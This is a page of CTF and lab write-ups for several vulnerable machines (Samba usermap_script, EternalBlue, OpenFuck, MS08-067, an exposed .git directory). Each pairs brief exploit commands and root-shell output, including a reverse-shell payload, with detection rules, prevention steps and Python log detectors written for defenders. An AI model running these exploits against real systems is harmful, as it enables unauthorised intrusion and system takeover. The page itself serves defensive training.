CTF & Pentesting

Attack & Defend

Offensive practice is defensive training. Each writeup documents the full attack chain — enumeration to root — then flips perspective with a Defender's Lens: the MITRE ATT&CK techniques triggered, the Windows Event IDs or Sysmon events that fire, and the SIEM detection logic a SOC analyst would write to catch it.

Why a SOC analyst does CTF — Understanding the attacker's methodology, tooling, and timing is the only way to write detection rules that actually work. Knowing that EternalBlue triggers Event ID 7045 and a DoublePulsar service install is the difference between a rule that catches WannaCry and one that doesn't.
In Progress: Content Coming Soon

CTF write-ups, machine walkthroughs, and lab notes are being added here. Check back soon for full coverage of CTF challenges and pentesting labs.

HTB · Easy · Linux · Jan 2025
Lame
Samba 3.0.20 usermap_script RCE (CVE-2007-2447) — direct root shell, no privilege escalation step. One of HTB's foundational Linux machines.
Recon → Enum → Exploit → Root
01 — Recon
01 Port Scan: Full TCP scan flags vsftpd 2.3.4, OpenSSH 4.7p1, and Samba 3.0.20 on 139/445. Anonymous SMB enumeration is allowed.
02 Version Research: searchsploit samba 3.0.20 → CVE-2007-2447 usermap_script command injection. No credentials needed.
02 — Exploitation
msf6 > use exploit/multi/samba/usermap_script
msf6 > set RHOSTS 10.10.10.3 ; run
[+] Command shell session 1 opened
$ id
uid=0(root) gid=0(root) groups=0(root)
03 — Screenshots
04 — Flags
🚩 User
69454a██████████
👑 Root
8bf3e0██████████
05 — Video Walkthrough
🛡️ Defender's Lens
Detection & Response — Samba CVE-2007-2447
MITRE ATT&CK: T1210 Exploitation of Remote Services · T1059 Command and Scripting Interpreter
Log Sources: Samba service logs (/var/log/samba/log.smbd), Linux auth logs (/var/log/auth.log), process audit logs if auditd is running.
Detection Signals: Shell process (bash/sh) spawned as a child of the smbd process. Unusual outbound connection initiated by the Samba service (smbd) on a host that normally only accepts inbound 445/tcp. Privilege change to UID 0 outside normal admin activity.
SIEM Rule Hint: process.parent.name:smbd AND process.name:(bash OR sh OR python)
Prevention: Patch Samba to 3.0.25c or later. Restrict anonymous SMB access. Use a host firewall to limit 445/tcp to trusted hosts only.
HTB · Easy · Windows · Jan 2025
Blue
MS17-010 EternalBlue on unpatched Windows 7 SP1. The CVE behind WannaCry — foundational knowledge for defensive security work.
Recon → Enum → Exploit → Root
01 — Recon
01 SMB Vuln Scan: nmap --script smb-vuln-ms17-010 confirms VULNERABLE. Windows 7 SP1, SMBv1 enabled, port 445 open.
02 Exploit Selection: Metasploit ms17_010_eternalblue module. Payload: windows/x64/meterpreter/reverse_tcp via tun0.
02 — Exploitation
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 10.10.10.40 ; set LHOST tun0 ; run
[+] SYSTEM shell obtained via EternalBlue!
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
03 — Screenshots
04 — Flags
🚩 User
ff4523██████████
👑 Root
4dad0e██████████
05 — Video Walkthrough
🛡️ Defender's Lens
Detection & Response — MS17-010 EternalBlue
MITRE ATT&CK: T1210 Exploitation of Remote Services · T1068 Exploitation for Privilege Escalation
Log Sources: Windows Security Event Log, Sysmon (Event IDs 1, 3, 7), Windows System Event Log, network firewall logs on port 445.
Detection Signals: Sysmon Event 3 — unexpected inbound connection to 445 from a non-domain host. Event ID 7045 — new service installed (DoublePulsar backdoor). Sysmon Event 1 — cmd.exe or powershell.exe spawned as NT AUTHORITY\SYSTEM without a parent process.
SIEM Rule Hint: event.code:7045 AND winlog.event_data.ServiceFileName:*ADMIN$*
Prevention: Apply MS17-010 (KB4012212). Disable SMBv1: Set-SmbServerConfiguration -EnableSMB1Protocol $false (that cmdlet exists on Windows 8 / Server 2012 and later; on Windows 7 SMBv1 is turned off through the SMB1 value under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters). Block port 445 inbound at the perimeter. Network-segment legacy Windows systems.
VulnHub · Easy · Linux · Feb 2025
Kioptrix Level 1
Apache mod_ssl OpenFuck exploit on a local VulnHub VM — full lab workflow from download to root shell.
Recon → Enum → Exploit → Root
00 — Lab Setup
Downloaded Kioptrix Level 1 (.ova) from VulnHub. Imported into VirtualBox alongside Kali Linux. Both assigned to the same NAT Network. Target IP discovered with netdiscover -r 192.168.100.0/24.
01 — Recon & Exploitation
$ netdiscover -r 192.168.100.0/24
192.168.100.15   VirtualBox NIC   ← target
$ nmap -A 192.168.100.15
80/tcp  Apache/1.3.20 | 443/tcp mod_ssl/2.8.4
$ gcc -o openfuck 47080.c -lcrypto
$ ./openfuck 0x6b 192.168.100.15 443 -c 40
bash# id
uid=0(root) gid=0(root)
02 — Root
Root Obtained: uid=0(root) gid=0(root)
03 — Screenshots
🛡️ Defender's Lens
Detection & Response — Apache mod_ssl OpenFuck
MITRE ATT&CK: T1190 Exploit Public-Facing Application · T1068 Exploitation for Privilege Escalation
Log Sources: Apache access log (/var/log/apache/access_log), Apache error log, system auth logs, process monitoring (auditd).
Detection Signals: Malformed HTTPS request patterns targeting the mod_ssl handshake. Shell (bash/sh) spawned as a child of httpd/apache2. Outbound connection from the web server process to an attacker IP.
SIEM Rule Hint: process.parent.name:httpd AND process.name:(bash OR sh) AND user.id:0
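The Lame rule hint (process.parent.name:smbd AND process.name:(bash OR sh OR python)) and the Kioptrix one above (process.parent.name:httpd AND process.name:(bash OR sh) AND user.id:0) are the same detection idea: a network service should never be the parent of an interactive shell. The Python below is an added example, not code from either write-up; it expresses the two hints as data and runs them over constructed ECS-style process events. The field names process.name, process.parent.name and user.id come from the hints; the rule names, the apache2 alias for httpd and the sample events are assumptions made for this example.

```python
import json

# The two SIEM rule hints from the Lame and Kioptrix Defender's Lens sections, as data.
# Rule names and the "apache2" alias for httpd are assumptions added for this example.
RULES = [
    {   # Lame: process.parent.name:smbd AND process.name:(bash OR sh OR python)
        "name": "shell-spawned-by-smbd",
        "parents": {"smbd"},
        "children": {"bash", "sh", "python"},
        "require_root": False,
    },
    {   # Kioptrix: process.parent.name:httpd AND process.name:(bash OR sh) AND user.id:0
        "name": "root-shell-spawned-by-httpd",
        "parents": {"httpd", "apache2"},
        "children": {"bash", "sh"},
        "require_root": True,
    },
]

# Constructed ECS-style process-creation events (one JSON document per line).
# Sample input written for this example, not logs from either machine.
SAMPLE_EVENTS = """\
{"@timestamp":"2025-01-12T10:01:03Z","host":"lame","process":{"name":"smbd","parent":{"name":"smbd"}},"user":{"id":"0"}}
{"@timestamp":"2025-01-12T10:01:07Z","host":"lame","process":{"name":"sh","parent":{"name":"smbd"}},"user":{"id":"0"}}
{"@timestamp":"2025-01-12T10:01:09Z","host":"lame","process":{"name":"id","parent":{"name":"sh"}},"user":{"id":"0"}}
{"@timestamp":"2025-02-03T14:22:41Z","host":"kioptrix","process":{"name":"httpd","parent":{"name":"httpd"}},"user":{"id":"48"}}
{"@timestamp":"2025-02-03T14:22:44Z","host":"kioptrix","process":{"name":"bash","parent":{"name":"httpd"}},"user":{"id":"0"}}
{"@timestamp":"2025-02-03T14:30:00Z","host":"kioptrix","process":{"name":"sh","parent":{"name":"httpd"}},"user":{"id":"48"}}
{"@timestamp":"2025-02-03T15:00:00Z","host":"kioptrix","process":{"name":"bash","parent":{"name":"sshd"}},"user":{"id":"1000"}}
"""


def parse_event(line):
    """Flatten one JSON event into the fields the rules need."""
    doc = json.loads(line)
    proc = doc.get("process", {})
    return {
        "timestamp": doc.get("@timestamp"),
        "host": doc.get("host"),
        "name": proc.get("name"),
        "parent": proc.get("parent", {}).get("name"),
        "uid": str(doc.get("user", {}).get("id", "")),
    }


def match_rule(rule, ev):
    """True when a single flattened event satisfies the rule."""
    if ev["parent"] not in rule["parents"] or ev["name"] not in rule["children"]:
        return False
    return ev["uid"] == "0" if rule["require_root"] else True


def detect(lines, rules=RULES):
    """Run every rule over every event; return alerts in log order."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        for rule in rules:
            if match_rule(rule, ev):
                alerts.append({"rule": rule["name"], "host": ev["host"],
                               "timestamp": ev["timestamp"], "parent": ev["parent"],
                               "process": ev["name"], "uid": ev["uid"]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS.splitlines()):
        print(f'{a["timestamp"]} {a["host"]}: {a["rule"]} '
              f'({a["parent"]} -> {a["process"]}, uid={a["uid"]})')
```

The sixth sample event (sh under httpd as UID 48) deliberately does not fire: the Kioptrix hint pins user.id:0 so that CGI-driven shells running as the web-server account do not flood the queue. That is a tuning choice, not a law. An exploit's first shell typically runs as the web-server account before any privilege escalation, so a second, lower-severity rule without the UID condition is worth keeping alongside the strict one.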
Prevention: Update Apache to 2.0+ and OpenSSL to a patched version. Run Apache with a dedicated low-privilege user. Apply ModSecurity WAF rules to detect exploit buffer patterns.
CTF Event · Medium · Web · Mar 2025
Git Exposed
Exposed .git directory → source code recovery → hardcoded creds → admin flag. WebSec CTF 2025 web challenge.
Recon → Enum → Exploit → Flag
01 — Discovery & Exploitation
$ gobuster dir -u http://target.ctf/ -w raft-medium.txt
/backup/.git (200) ← exposed!
$ git-dumper http://target.ctf/backup/.git ./src
$ grep -ri "password\|secret" ./src
config.php: $admin_pass = 'P@ss1234';
$ curl -d "user=admin&pass=P@ss1234" http://target.ctf/admin/
flag{g1t_s3cr3ts_4r3_n0t_s3cr3t}
02 — Flag
🚩 CTF Flag
flag{g1t_s3cr3ts_4r3_n0t_s3cr3t}
03 — Screenshots
04 — Video Walkthrough
🛡️ Defender's Lens
Detection & Response — Exposed .git Directory
MITRE ATT&CK: T1190 Exploit Public-Facing Application · T1552 Unsecured Credentials
Log Sources: Web server access logs (Apache/Nginx). Look specifically for GET requests to /.git/HEAD, /.git/config, /.git/objects/.
Detection Signals: Multiple sequential 200 responses to /.git/* paths from a single IP. Burst of requests for git object files (paths under /.git/objects/ made of a two-character directory plus a 38-character hex filename, 40 hex characters in total). User-agent strings associated with git-dumper or GitHack tools.
SIEM Rule Hint: http.request.uri:".git" AND http.response.status_code:200
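The three detection signals above can be checked directly against a web server's access log. The Python below is an added example, not code from the challenge or the write-up: it parses Apache/Nginx combined-format lines, aggregates .git requests per source IP, and emits a finding for each signal (served .git paths, a burst of object-file fetches, a tool User-Agent) plus a low-severity one for probes that were answered with 404. The log lines, the IPs, the "git-dumper/1.0" User-Agent string and the burst threshold are constructed assumptions for this example.

```python
import re
from collections import defaultdict

# Apache/Nginx "combined" log format: ip ident user [time] "request" status size "referer" "user-agent".
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Anchored on the directory so that /.gitignore or /release.git do not count as hits.
GIT_PATH_RE = re.compile(r'/\.git(?:/|$)')
# Loose objects live at /.git/objects/<2 hex>/<38 hex>: 40 hex characters in total.
GIT_OBJECT_RE = re.compile(r'/\.git/objects/[0-9a-f]{2}/[0-9a-f]{38}$')
# Assumed User-Agent substrings for the dumping tools named in the write-up.
TOOL_UA_RE = re.compile(r'git-dumper|githack', re.IGNORECASE)

# Constructed sample access-log lines for this example, not logs from the challenge server.
SAMPLE_LOG = """\
198.51.100.20 - - [10/Mar/2025:09:00:01 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2025:09:14:02 +0000] "GET /backup/.git/HEAD HTTP/1.1" 200 23 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2025:09:14:02 +0000] "GET /backup/.git/config HTTP/1.1" 200 137 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2025:09:14:03 +0000] "GET /backup/.git/objects/a1/0123456789abcdef0123456789abcdef012345 HTTP/1.1" 200 412 "-" "git-dumper/1.0"
203.0.113.7 - - [10/Mar/2025:09:14:03 +0000] "GET /backup/.git/objects/b2/0123456789abcdef0123456789abcdef012346 HTTP/1.1" 200 388 "-" "git-dumper/1.0"
203.0.113.7 - - [10/Mar/2025:09:14:03 +0000] "GET /backup/.git/objects/c3/0123456789abcdef0123456789abcdef012347 HTTP/1.1" 200 901 "-" "git-dumper/1.0"
203.0.113.7 - - [10/Mar/2025:09:14:04 +0000] "GET /backup/.git/objects/d4/0123456789abcdef0123456789abcdef012348 HTTP/1.1" 200 77 "-" "git-dumper/1.0"
203.0.113.7 - - [10/Mar/2025:09:14:04 +0000] "GET /backup/.git/objects/e5/0123456789abcdef0123456789abcdef012349 HTTP/1.1" 200 1450 "-" "git-dumper/1.0"
192.0.2.99 - - [10/Mar/2025:11:30:45 +0000] "GET /.git/HEAD HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line; return a dict, or None if it does not match."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyze(lines, object_burst=5):
    """Aggregate .git requests per source IP and turn them into findings."""
    per_ip = defaultdict(lambda: {"git_200": 0, "git_404": 0, "objects": 0, "tool_ua": False})
    for line in lines:
        rec = parse_line(line)
        if rec is None or not GIT_PATH_RE.search(rec["path"]):
            continue
        stats = per_ip[rec["ip"]]
        if rec["status"] == 200:
            stats["git_200"] += 1      # the repository is actually being served
        elif rec["status"] == 404:
            stats["git_404"] += 1      # probed, but nothing exposed
        if GIT_OBJECT_RE.search(rec["path"]):
            stats["objects"] += 1
        if TOOL_UA_RE.search(rec["ua"]):
            stats["tool_ua"] = True

    findings = []
    for ip, stats in per_ip.items():
        if stats["git_200"]:
            findings.append({"ip": ip, "signal": "git_exposed", "severity": "high", "count": stats["git_200"]})
        if stats["objects"] >= object_burst:
            findings.append({"ip": ip, "signal": "object_burst", "severity": "high", "count": stats["objects"]})
        if stats["tool_ua"]:
            findings.append({"ip": ip, "signal": "tool_user_agent", "severity": "medium", "count": 1})
        if stats["git_404"] and not stats["git_200"]:
            findings.append({"ip": ip, "signal": "git_probe_blocked", "severity": "low", "count": stats["git_404"]})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG.splitlines()):
        print(f'{f["ip"]:<14} {f["signal"]:<18} {f["severity"]:<6} x{f["count"]}')
```

Two points worth carrying into a real rule: the hint's bare ".git" substring also matches /.gitignore and any path ending in .git, so anchoring on the directory separator as GIT_PATH_RE does removes a steady source of noise; and a 404 for /.git/HEAD is not an exposure, but a probe from an address that will try the next webroot too, which is why it still gets a low-severity finding.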
Prevention: Block access to .git at the web server (Nginx: location ~ /\.git { deny all; }; Apache: RedirectMatch 404 /\.git). Exclude the .git directory from deployment artefacts in the pipeline. Never deploy with development artefacts in the webroot.
HTB · Easy · Windows XP · Feb 2025
Legacy
MS08-067 NetAPI buffer overflow via manual Python PoC — no Metasploit. Shows why unpatched legacy Windows remains a critical attack surface.
Recon → Enum → Exploit → Root
01 — Recon & Exploitation
$ nmap --script smb-vuln-ms08-067 10.10.10.4
VULNERABLE: ms08-067 — Risk: CRITICAL
$ python ms08-067.py 10.10.10.4 6 445
[*] Sending exploit buffer...
[+] Shell obtained!
C:\> whoami
nt authority\system
02 — Screenshots
03 — Flags
🚩 User
993442██████████
👑 Root
aaa9e7██████████
🛡️ Defender's Lens
Detection & Response — MS08-067 NetAPI
MITRE ATT&CK: T1210 Exploitation of Remote Services · T1574 Hijack Execution Flow
Log Sources: Windows Security Event Log, System Event Log, network IDS/IPS (Snort/Suricata on port 445), perimeter firewall NetFlow.
Detection Signals: Malformed RPC/SMB NetAPI request signature (Snort SID 14723). Sysmon Event 1 — cmd.exe spawned from services.exe under the SYSTEM context. Event ID 4648 — logon attempt using explicit credentials following the exploit.
SIEM Rule Hint: event.code:4688 AND process.name:cmd.exe AND process.parent.name:services.exe AND user.name:"NT AUTHORITY\\SYSTEM"
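The Blue rule hint (event.code:7045 AND winlog.event_data.ServiceFileName:*ADMIN$*) and the Legacy one above both key on a Windows event code plus a field test, so one small detector serves both. The Python below is an added example, not code from either write-up: it expresses the two hints as data and runs them over constructed ECS/winlogbeat-style event records. The field names event.code, process.name, process.parent.name, user.name and winlog.event_data.ServiceFileName come from the hints; the rule names, the sample records and the service name and path in the 7045 sample are assumptions made for this example.

```python
import fnmatch
import json

# The SIEM rule hints from the Blue and Legacy Defender's Lens sections, as data.
# Rule names are assumptions added for this example.
RULES = [
    {   # Blue: event.code:7045 AND winlog.event_data.ServiceFileName:*ADMIN$*
        "name": "service-installed-from-admin-share",
        "code": "7045",
        "match": lambda ev: fnmatch.fnmatchcase(ev["service_file"].upper(), "*ADMIN$*"),
    },
    {   # Legacy: event.code:4688 AND process.name:cmd.exe AND process.parent.name:services.exe
        #         AND user.name:"NT AUTHORITY\\SYSTEM"
        "name": "cmd-spawned-by-services-as-system",
        "code": "4688",
        "match": lambda ev: (ev["process"].lower() == "cmd.exe"
                             and ev["parent"].lower() == "services.exe"
                             and ev["user"].upper() == r"NT AUTHORITY\SYSTEM"),
    },
]

# Constructed ECS/winlogbeat-style Windows event records, one JSON document per line.
# Sample input written for this example (service name and path are made up), not logs from either box.
SAMPLE_EVENTS = r"""
{"@timestamp":"2025-01-15T20:02:11Z","host":"blue","event":{"code":"7045"},"winlog":{"event_data":{"ServiceName":"wuauserv","ServiceFileName":"C:\\Windows\\system32\\svchost.exe -k netsvcs"}}}
{"@timestamp":"2025-01-15T20:05:42Z","host":"blue","event":{"code":"7045"},"winlog":{"event_data":{"ServiceName":"EXAMPLESVC","ServiceFileName":"\\\\10.10.10.40\\ADMIN$\\examplesvc.exe"}}}
{"@timestamp":"2025-02-09T18:40:10Z","host":"legacy","event":{"code":"4688"},"process":{"name":"cmd.exe","parent":{"name":"services.exe"}},"user":{"name":"NT AUTHORITY\\SYSTEM"}}
{"@timestamp":"2025-02-09T18:41:00Z","host":"legacy","event":{"code":"4688"},"process":{"name":"cmd.exe","parent":{"name":"explorer.exe"}},"user":{"name":"LEGACY\\john"}}
{"@timestamp":"2025-02-09T18:41:05Z","host":"legacy","event":{"code":"4688"},"process":{"name":"conhost.exe","parent":{"name":"services.exe"}},"user":{"name":"NT AUTHORITY\\SYSTEM"}}
{"@timestamp":"2025-02-09T18:42:30Z","host":"legacy","event":{"code":"4688"},"process":{"name":"cmd.exe","parent":{"name":"services.exe"}},"user":{"name":"LEGACY\\svc_backup"}}
"""


def parse_event(line):
    """Flatten one JSON record into the fields the rules consult."""
    doc = json.loads(line)
    proc = doc.get("process", {})
    data = doc.get("winlog", {}).get("event_data", {})
    return {
        "timestamp": doc.get("@timestamp"),
        "host": doc.get("host"),
        "code": str(doc.get("event", {}).get("code", "")),
        "process": proc.get("name", ""),
        "parent": proc.get("parent", {}).get("name", ""),
        "user": doc.get("user", {}).get("name", ""),
        "service_file": data.get("ServiceFileName", ""),
    }


def matches(rule, ev):
    """An event matches when the event code agrees and the rule's predicate holds."""
    return ev["code"] == rule["code"] and rule["match"](ev)


def detect(lines, rules=RULES):
    """Run every rule over every record; return alerts in log order."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        for rule in rules:
            if matches(rule, ev):
                detail = ev["service_file"] or f'{ev["parent"]} -> {ev["process"]} as {ev["user"]}'
                alerts.append({"rule": rule["name"], "host": ev["host"],
                               "timestamp": ev["timestamp"], "detail": detail})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS.splitlines()):
        print(f'{a["timestamp"]} {a["host"]}: {a["rule"]} [{a["detail"]}]')
```

The last sample record (cmd.exe under services.exe, but as a service account rather than SYSTEM) is left unflagged because the hint pins user.name. services.exe spawning cmd.exe directly is rare under any account, so a broader variant of the 4688 rule at lower severity is a reasonable companion. Note also that the *ADMIN$* glob matches anywhere in ServiceFileName, which is what the hint intends: the suspicious property is a service binary that lives on an administrative share, not a particular file name.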
Prevention: Apply MS08-067 (KB958644). Immediately. Isolate Windows XP systems — they are end-of-life with no further patches. Deploy host-based IDS. Restrict SMB exposure at the network perimeter.